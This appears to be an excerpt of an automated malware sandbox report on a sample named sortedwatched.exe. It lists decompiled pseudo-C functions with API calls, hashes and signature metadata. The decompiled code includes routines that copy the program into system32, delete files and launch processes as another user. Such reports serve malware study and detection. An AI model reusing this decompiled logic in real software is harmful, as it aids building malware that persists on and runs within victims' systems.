								_v12 = 0x8000 -  *(_t128 + 0x2af0);
								_t101 = E00404AD4(_t128,  *_t148,  &_v8, _t128 + 0x2b04, _t128 + 0x2b04 + _t131,  &_v12, _t143);
								_t133 = _v8;
								 *(_t128 + 0xab04) = _t101;
								 *_t148 =  *_t148 + _t133;
								 *((intOrPtr*)(_t148 + 4)) =  *((intOrPtr*)(_t148 + 4)) - _t133;
								 *((intOrPtr*)(_t148 + 8)) =  *((intOrPtr*)(_t148 + 8)) + _t133;
								 *((intOrPtr*)(_t148 + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
								_t135 = _v12;
								 *(_t128 + 0x2af4) = _t135;
								_t152 =  *(_t148 + 0x10);
								__eflags = _t135 - _t152;
								_v16 = _t101;
								_t153 =  <  ? _t135 : _t152;
								memcpy( *(_t148 + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t153);
								 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t153;
								_t156 = _t156 + 0x20;
								 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t153;
								 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t153;
								 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t153;
								_t136 = _v16;
								_t145 =  *(_t128 + 0x2af4);
								 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t153 & 0x00007fff;
								__eflags = _t136;
								if(_t136 < 0) {
									goto L3;
								}
								__eflags = _t136 - 1;
								if(_t136 != 1) {
									L18:
									__eflags = _t136;
									if(_t136 == 0) {
										__eflags = _t145;
										_t137 = 0xfffffffb;
										_t111 =  !=  ? _t137 : 1;
										return  !=  ? _t137 : 1;
									}
									__eflags =  *(_t148 + 0x10);
									if( *(_t148 + 0x10) == 0) {
										L8:
										_push(0xfffffffb);
										goto L23;
									}
									_t143 = _v24;
									continue;
								}
								__eflags = _v20;
								if(_v20 == 0) {
									goto L8;
								}
								goto L18;
							}
							goto L3;
						}
						_t154 =  *((intOrPtr*)(__ecx + 0x10));
						__eflags = _t93 - _t154;
						_t155 =  <  ? _t93 : _t154;
						memcpy( *(__ecx + 0xc),  *(_t128 + 0x2af0) + 0x2b04 + _t128, _t155);
						 *(_t148 + 0xc) =  *(_t148 + 0xc) + _t155;
						 *(_t148 + 0x10) =  *(_t148 + 0x10) - _t155;
						 *((intOrPtr*)(_t148 + 0x14)) =  *((intOrPtr*)(_t148 + 0x14)) + _t155;
						 *(_t128 + 0x2af4) =  *(_t128 + 0x2af4) - _t155;
						__eflags =  *(_t128 + 0xab04);
						 *(_t128 + 0x2af0) =  *(_t128 + 0x2af0) + _t155 & 0x00007fff;
						if( *(_t128 + 0xab04) != 0) {
							L14:
							return 0;
						}
						__eflags =  *(_t128 + 0x2af4);
						if( *(_t128 + 0x2af4) != 0) {
							goto L14;
						}
						return 1;
					}
					_v8 =  *((intOrPtr*)(__ecx + 4));
					_v12 =  *((intOrPtr*)(__ecx + 0x10));
					_t126 = E00404AD4(_t128,  *__ecx,  &_v8,  *(__ecx + 0xc),  *(__ecx + 0xc),  &_v12, _t143 | 0x00000004);
					_t139 = _v8;
					 *(_t128 + 0xab04) = _t126;
					 *__ecx =  *__ecx + _t139;
					 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(__ecx + 4)) - _t139;
					 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(__ecx + 8)) + _t139;
					 *((intOrPtr*)(__ecx + 0x30)) =  *((intOrPtr*)(_t128 + 0x1c));
					_t141 = _v12;
					 *(__ecx + 0xc) =  *(__ecx + 0xc) + _t141;
					 *((intOrPtr*)(__ecx + 0x10)) =  *((intOrPtr*)(__ecx + 0x10)) - _t141;
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + _t141;
					__eflags = _t126;
					if(__eflags < 0) {
						goto L3;
					}
					if(__eflags == 0) {
						return 1;
					}
					_t34 = _t128 + 0xab04;
					 *_t34 =  *(_t128 + 0xab04) | 0xffffffff;
					__eflags =  *_t34;
					goto L8;
				}
				L3:
				_push(0xfffffffd);
				goto L23;
			}





























                  0x00402858
                  0x0040285c
                  0x0040285f
                  0x00402a69
                  0x00402a69
                  0x00402a6b
                  0x00402a6b
                  0x00000000
                  0x00402a6b
                  0x00402865
                  0x0040286a
                  0x00000000
                  0x00000000
                  0x0040287a
                  0x0040287b
                  0x00402881
                  0x00402884
                  0x0040288a
                  0x0040288d
                  0x00402899
                  0x004028a5
                  0x004028ab
                  0x004028ad
                  0x00402917
                  0x0040291d
                  0x0040291f
                  0x00402987
                  0x00402990
                  0x00402996
                  0x004029a0
                  0x004029ba
                  0x004029bf
                  0x004029c2
                  0x004029c8
                  0x004029ca
                  0x004029cd
                  0x004029d3
                  0x004029d6
                  0x004029d9
                  0x004029df
                  0x004029e2
                  0x004029e4
                  0x004029ed
                  0x004029fc
                  0x00402a02
                  0x00402a05
                  0x00402a08
                  0x00402a0b
                  0x00402a14
                  0x00402a1c
                  0x00402a24
                  0x00402a2a
                  0x00402a30
                  0x00402a32
                  0x00000000
                  0x00000000
                  0x00402a3b
                  0x00402a3d
                  0x00402a49
                  0x00402a49
                  0x00402a4b
                  0x00402a61
                  0x00402a63
                  0x00402a64
                  0x00000000
                  0x00402a64
                  0x00402a4d
                  0x00402a51
                  0x00402909
                  0x00402909
                  0x00000000
                  0x00402909
                  0x00402a57
                  0x00000000
                  0x00402a57
                  0x00402a3f
                  0x00402a43
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402a43
                  0x00000000
                  0x00402987
                  0x00402921
                  0x00402924
                  0x00402926
                  0x0040293b
                  0x00402941
                  0x00402947
                  0x0040294a
                  0x00402953
                  0x00402960
                  0x00402967
                  0x0040296d
                  0x00402980
                  0x00000000
                  0x00402980
                  0x0040296f
                  0x00402976
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040297a
                  0x004028b5
                  0x004028c0
                  0x004028d1
                  0x004028d6
                  0x004028dc
                  0x004028e2
                  0x004028e4
                  0x004028e7
                  0x004028ed
                  0x004028f0
                  0x004028f3
                  0x004028f6
                  0x004028f9
                  0x004028fc
                  0x004028fe
                  0x00000000
                  0x00000000
                  0x00402900
                  0x00000000
                  0x00402910
                  0x00402902
                  0x00402902
                  0x00402902
                  0x00000000
                  0x00402902
                  0x0040289b
                  0x0040289b
                  0x00000000

                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0HCw$Ab@
                  • API String ID: 0-707421244
                  • Opcode ID: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction ID: 085e4857d5f96ebe99bd6dbc6265157c6608e9d95e27a4949ae474babd6914cb
                  • Opcode Fuzzy Hash: 33f034056c3a3427ec488e59f39741281436f7c45068a44fc4d7b3f08e725971
                  • Instruction Fuzzy Hash: 7A618171B00606AFCB58CF69CA88996B3B4FF04314F14827ADC19DB6C5DB78A950CF95
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00405FA4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00405FA4(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr* _v8;
				void* _t28;
				void* _t44;
				void* _t45;
				intOrPtr _t46;
				signed int _t56;
				void* _t78;
				void* _t84;
				void* _t86;
				intOrPtr _t89;
				intOrPtr _t91;
				char* _t92;
				void* _t93;

				_t46 = _a4;
				_v8 = __edx;
				E00401503(_t46, 0x808);
				E00405F15(_t46, E00401A52(0x4120d0, 0x680f9b3));
				L00401B09(_t25);
				_t28 = E00401A52(0x4122a0, 0x680f9b3);
				_t3 = _t46 + 0x400; // 0x4065cd
				 *0x4143a4(_t3, 0x200, _t28, __ecx, _t46, _t78, _t86, _t45, __ecx);
				L00401B09(_t28);
				_t80 = _v8;
				_t56 = 3;
				_t89 = E004014F2(( *((intOrPtr*)(_v8 + 4)) + 2) / _t56 << 2);
				_v8 = _t89;
				if(_t89 != 0) {
					_a4 = E0040156A( *_t80,  *((intOrPtr*)(_t80 + 4)), _t89);
					_t84 = (GetTickCount() & 0x0000000f) + 4;
					_t14 = E0040162B(_t89, _a4) + 1; // 0x1
					_t91 = E004014F2(_t14 + _t84);
					 *((intOrPtr*)(_t46 + 0x800)) = _t91;
					if(_t91 == 0) {
						_t85 = _v8;
					} else {
						E00401E27(_t91, _t84);
						_t92 = _t91 + _t84;
						_t85 = _v8;
						 *_t92 = 0x3d;
						_t93 = _t92 + 1;
						_t44 = E00401680(_v8, _a4, _t93);
						_t18 = _t46 + 0x800; // 0xc885c70e
						 *((intOrPtr*)(_t46 + 0x804)) = _t93 + _t44 -  *_t18;
					}
					E00401532(_t85);
				}
				return 0 |  *((intOrPtr*)(_t46 + 0x800)) != 0x00000000;
			}
















                  0x00405fa9
                  0x00405fae
                  0x00405fba
                  0x00405fd4
                  0x00405fdb
                  0x00405fea
                  0x00405ff3
                  0x00406000
                  0x0040600b
                  0x00406010
                  0x00406017
                  0x0040602a
                  0x0040602c
                  0x00406031
                  0x0040603f
                  0x00406052
                  0x0040605a
                  0x00406064
                  0x00406066
                  0x0040606e
                  0x0040609e
                  0x00406070
                  0x00406074
                  0x0040607c
                  0x0040607e
                  0x00406083
                  0x00406086
                  0x00406088
                  0x0040608f
                  0x00406096
                  0x00406096
                  0x004060a3
                  0x004060a3
                  0x004060b9

                  APIs
                    • Part of subcall function 00405F15: lstrlenW.KERNEL32(00000000,?,00000000,004061CD,?,004061CD,?), ref: 00405F26
                    • Part of subcall function 00405F15: GetTickCount.KERNEL32(?,004061CD,?), ref: 00405F2F
                  • _snwprintf.NTDLL ref: 00406000
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32 ref: 00406042
                    • Part of subcall function 00401E27: GetTickCount.KERNEL32(-00000004,00000000,004061CD), ref: 00401E39
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CountTick$Heap$AllocateProcess_snwprintflstrlen
                  • String ID: g8Cw
                  • API String ID: 459781281-3103284439
                  • Opcode ID: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction ID: 00cdad927da0c0ef8d73a3e5ef527bbb7d9062bc05b5f9e08202af6a880e88a8
                  • Opcode Fuzzy Hash: 76b03827719990e30b0c101892e01b597c257d1c543933898f8cee2b7d7ceefb
                  • Instruction Fuzzy Hash: BC31B531B000109BCB14EF658841A9E7796AFC4754F29817EED0AAF3D6DE789D0187D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F7A0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 23%
                  			E0040F7A0() {
				char _v8;
				char _v528;
				intOrPtr _t19;
				void* _t24;
				char _t32;
				void* _t33;
				void* _t35;

				_t32 = 0;
				_v8 = 0;
				_t24 =  *0x412ef4(0, 0, 0xf003f);
				if(_t24 != 0) {
					_t34 = E00401A52(0x4129d0, 0x4bf67e71);
					 *0x4143a4( &_v528, 0x104, _t9, 0x416840, _t33);
					L00401B09(_t34);
					_t35 =  *0x4134c8(_t24, 0x416530, 0x416530, 0x12, 0x10, 2, 0,  &_v528, 0, 0, 0, 0, 0);
					if(_t35 != 0) {
						if(E0040F504(_t24,  &_v8) != 0) {
							 *0x41353c(_t35, 1, _v8);
							E00401532(_v8);
						}
					} else {
						_t35 =  *0x413594(_t24, 0x416530, 0x10);
					}
					if(_t35 != 0) {
						_t19 =  *0x41315c(_t35, _t32, _t32);
						_t32 = _t19;
						 *0x4135a4(_t35);
					}
					E0040F6D0(_t24);
					 *0x4135a4(_t24);
				}
				return _t32;
			}










                  0x0040f7ab
                  0x0040f7b4
                  0x0040f7bd
                  0x0040f7c1
                  0x0040f7d7
                  0x0040f7eb
                  0x0040f7f6
                  0x0040f81c
                  0x0040f820
                  0x0040f840
                  0x0040f848
                  0x0040f851
                  0x0040f851
                  0x0040f822
                  0x0040f830
                  0x0040f830
                  0x0040f858
                  0x0040f85d
                  0x0040f864
                  0x0040f866
                  0x0040f866
                  0x0040f86e
                  0x0040f874
                  0x0040f87a
                  0x0040f882

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: 0eA$g8Cw
                  • API String ID: 3988819677-1352154256
                  • Opcode ID: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction ID: eaef89646e70cf25437eea923daa7feb7edf07035885503fb66571f4c5335789
                  • Opcode Fuzzy Hash: 8788b05d66e6191db14083dcb274117b82c263dd676d547b19645e5bf22e022a
                  • Instruction Fuzzy Hash: EF21F3726013147BD7206B665D49FEB3A6D9B85B01F00417ABD06F72D2DAB88E0496AC
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401D2B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68processUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 44%
                  			E00401D2B(WCHAR* __edx, void* _a8, struct _PROCESS_INFORMATION* _a12) {
				WCHAR* _v8;
				struct _STARTUPINFOW _v76;
				intOrPtr _t19;
				int _t24;
				long _t33;
				void* _t34;
				int _t35;

				_t33 = 0x44;
				_t35 = 0;
				_v8 = 0;
				E00401503( &_v76, _t33);
				_v76.cb = _t33;
				_t34 = _a8;
				if(_t34 == 0) {
					_t35 = CreateProcessW(0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
				} else {
					_t19 = E00401A52(0x412090, 0xdb2fc54);
					_push(0);
					_v76.lpDesktop = _t19;
					_push(_t34);
					_push( &_v8);
					if( *0x4154a0() != 0) {
						_t24 = CreateProcessAsUserW(_t34, 0, __edx, 0, 0, 0, 0x400, _v8, 0,  &_v76, _a12);
						_t35 = _t24;
						 *0x415564(_v8);
					}
					L00401B09(_v76.lpDesktop);
				}
				return _t35;
			}










                  0x00401d36
                  0x00401d3c
                  0x00401d40
                  0x00401d43
                  0x00401d48
                  0x00401d4b
                  0x00401d50
                  0x00401dc0
                  0x00401d52
                  0x00401d5c
                  0x00401d61
                  0x00401d62
                  0x00401d68
                  0x00401d69
                  0x00401d72
                  0x00401d8a
                  0x00401d93
                  0x00401d95
                  0x00401d95
                  0x00401d9e
                  0x00401d9e
                  0x00401dca

                  APIs
                  • CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401D8A
                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,?,00000000,?,0040FBF6), ref: 00401DBA
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateProcess$User
                  • String ID: M vu
                  • API String ID: 4042571897-696074975
                  • Opcode ID: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction ID: 8fb0d45fc8d51ab0f5bd0c7e4b9a4df30b4027125393a8a12e18b04e3b77fe86
                  • Opcode Fuzzy Hash: e3f8796ccff0070e9350f972b6a419064f6187467af522590b0749c7ed7297d7
                  • Instruction Fuzzy Hash: 64115E71A01228BBCB219B968C48DDFBFBDEF85764B144027F609A3250D6745D02C7A4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040FC67, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040FC67() {
				void* _t9;
				int _t10;
				void* _t15;
				intOrPtr* _t21;
				intOrPtr* _t22;

				_t22 =  *0x4164e4;
				_t21 = 0x4164e4;
				if(_t22 == 0) {
					return _t9;
				}
				do {
					_t15 = 0;
					if( *((intOrPtr*)(_t22 + 8)) == 1 ||  *((intOrPtr*)(_t22 + 8)) == 2) {
						_t15 = 1;
					}
					if( *((intOrPtr*)(_t22 + 8)) == 3) {
						_t10 = WaitForSingleObject( *(_t22 + 0x14), 0);
						if(_t10 == 0) {
							 *((intOrPtr*)(_t22 + 0x10))( *((intOrPtr*)(_t22 + 0xc)), _t10, _t10);
							E0040192A( *((intOrPtr*)(_t22 + 0xc)));
							_t10 = CloseHandle( *(_t22 + 0x14));
							_t15 = 1;
						}
					}
					if(_t15 == 0) {
						_t21 = _t22;
					} else {
						 *_t21 =  *_t22;
						_t10 = E00401532(_t22);
					}
					_t22 =  *_t21;
				} while (_t22 != 0);
				return _t10;
			}








                  0x0040fc68
                  0x0040fc6f
                  0x0040fc76
                  0x0040fcd7
                  0x0040fcd7
                  0x0040fc79
                  0x0040fc79
                  0x0040fc7f
                  0x0040fc89
                  0x0040fc89
                  0x0040fc8e
                  0x0040fc95
                  0x0040fc9d
                  0x0040fca4
                  0x0040fcaa
                  0x0040fcb2
                  0x0040fcba
                  0x0040fcba
                  0x0040fc9d
                  0x0040fcbd
                  0x0040fccc
                  0x0040fcbf
                  0x0040fcc3
                  0x0040fcc5
                  0x0040fcc5
                  0x0040fcce
                  0x0040fcd0
                  0x00000000

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040FC95
                  • CloseHandle.KERNEL32(?), ref: 0040FCB2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleObjectSingleWait
                  • String ID: dA
                  • API String ID: 528846559-3833285433
                  • Opcode ID: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction ID: 9783dac627fe2aad0d055cd04b4053eec809d95b972e8a9730baec20d1199667
                  • Opcode Fuzzy Hash: 3fd25aa55a6274f4f7e9cc92725da2f21c8c3f2147d4135f88846fc5401ef8fd
                  • Instruction Fuzzy Hash: E601B1322047118FE7304F65D999923B3A8BF44715711893BEC4363BA0C334AC48C648
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040108B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v18;
				struct _SHFILEOPSTRUCTW _v36;
				int _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;

				_t18 = __edx;
				_t19 = __ecx;
				memset( &_v36, 0, 0x1e);
				_v36.pFrom = _t19;
				_v36.pTo = _t18;
				_v36.fFlags = 0xe14;
				_t15 = 1;
				_v36.wFunc = 1;
				_t12 = SHFileOperationW( &_v36);
				if(_t12 != 0 || _v18 != _t12) {
					_t15 = 0;
				}
				return _t15;
			}









                  0x00401099
                  0x0040109e
                  0x004010a0
                  0x004010a9
                  0x004010b1
                  0x004010b4
                  0x004010bd
                  0x004010bf
                  0x004010c2
                  0x004010ca
                  0x004010d1
                  0x004010d1
                  0x004010db

                  APIs
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 00401091
                  Memory Dump Source
                  • Source File: 0000000C.00000002.559716338.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_2_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 1721435463-2966989349
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C5A7, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C5A7(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t11;

				_t5 = E00401A52(0x4127e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t11 = CreateEventW(0, 0, 0,  &_v132);
				 *0x414e6c = _t11;
				return 0 | _t11 != 0x00000000;
			}






                  0x0040c5bb
                  0x0040c5cf
                  0x0040c5da
                  0x0040c5e8
                  0x0040c5f0
                  0x0040c600

                  APIs
                  • _snwprintf.NTDLL ref: 0040C5CF
                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 0040C5E8
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateEvent_snwprintf
                  • String ID: g8Cw
                  • API String ID: 3138640819-3103284439
                  • Opcode ID: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction ID: 966a77967990d1c2b3e105985163cbd3e7ea594235671e381eb49e2a5e3bd5e9
                  • Opcode Fuzzy Hash: bf91c9978e232df667675dfab0b91fafffa405702bdcbacc6dac383674977833
                  • Instruction Fuzzy Hash: BDF0A7717001146BD701ABA96C05AFB36ACEB44304F00803EF905D7190EE34D81087DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F292, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F292() {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t15;
				void* _t18;
				void* _t19;

				if( *0x415f4c == 0) {
					E0040F227();
				} else {
					E0040F214();
				}
				E00401503(0x416840, 0x104);
				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
				_t19 = _t3;
				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
				_t10 = _t19;
				return HeapFree(GetProcessHeap(), 0, _t10);
			}









                  0x0040f299
                  0x0040f2a2
                  0x0040f29b
                  0x0040f29b
                  0x0040f29b
                  0x0040f2b8
                  0x0040f2c7
                  0x0040f2d6
                  0x0040f2db
                  0x0040f2e4
                  0x00401542

                  APIs
                  • _snwprintf.NTDLL ref: 0040F2DB
                    • Part of subcall function 0040F214: SHGetFolderPathW.SHELL32(00000000,00000029,00000000,00000000,00416A48,0040F2A0,0040F94C,00000102,0040C81E,?,0040C894,?,?,0040F111), ref: 0040F220
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: FolderPath_snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3078599568-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F227, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0040F227() {
				void* _t3;
				void* _t8;
				void* _t10;
				void* _t13;
				void* _t14;

				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
				_t3 = E00401A52(0x412df0, 0x4bf67e71);
				_t14 = _t3;
				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
				_t8 = _t14;
				return HeapFree(GetProcessHeap(), 0, _t8);
			}








                  0x0040f236
                  0x0040f246
                  0x0040f251
                  0x0040f25a
                  0x0040f263
                  0x00401542

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004010DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
				short _v524;

				_t12 = E00401A52(0x412000, 0x7b38aa91);
				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
				L00401B09(_t12);
				return DeleteFileW( &_v524);
			}




                  0x004010f5
                  0x00401109
                  0x00401114
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000C.00000001.326445222.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 0000000C.00000001.326500443.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_12_1_400000_sortedwatched.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040499D, Relevance: 5.1, APIs: 4, Instructions: 98COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
				intOrPtr _t68;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				int* _t85;
				void* _t86;

				_t83 = _a8;
				_t85 = __ecx;
				asm("cdq");
				_t80 = 3;
				 *(__ecx + 8) = _t83;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
				asm("cdq");
				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
				_t84 = _t83 & 0x00008000;
				if(_t84 == 0) {
					_t15 = _t85 + 0x29272; // 0x29272
					memset(_t15, 0, 0x10000);
					_t86 = _t86 + 0xc;
				}
				 *((intOrPtr*)(_t85 + 0x44)) = 0;
				_t17 = _t85 + 0x9273; // 0x9273
				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
				_t19 = _t85 + 0x9272; // 0x9272
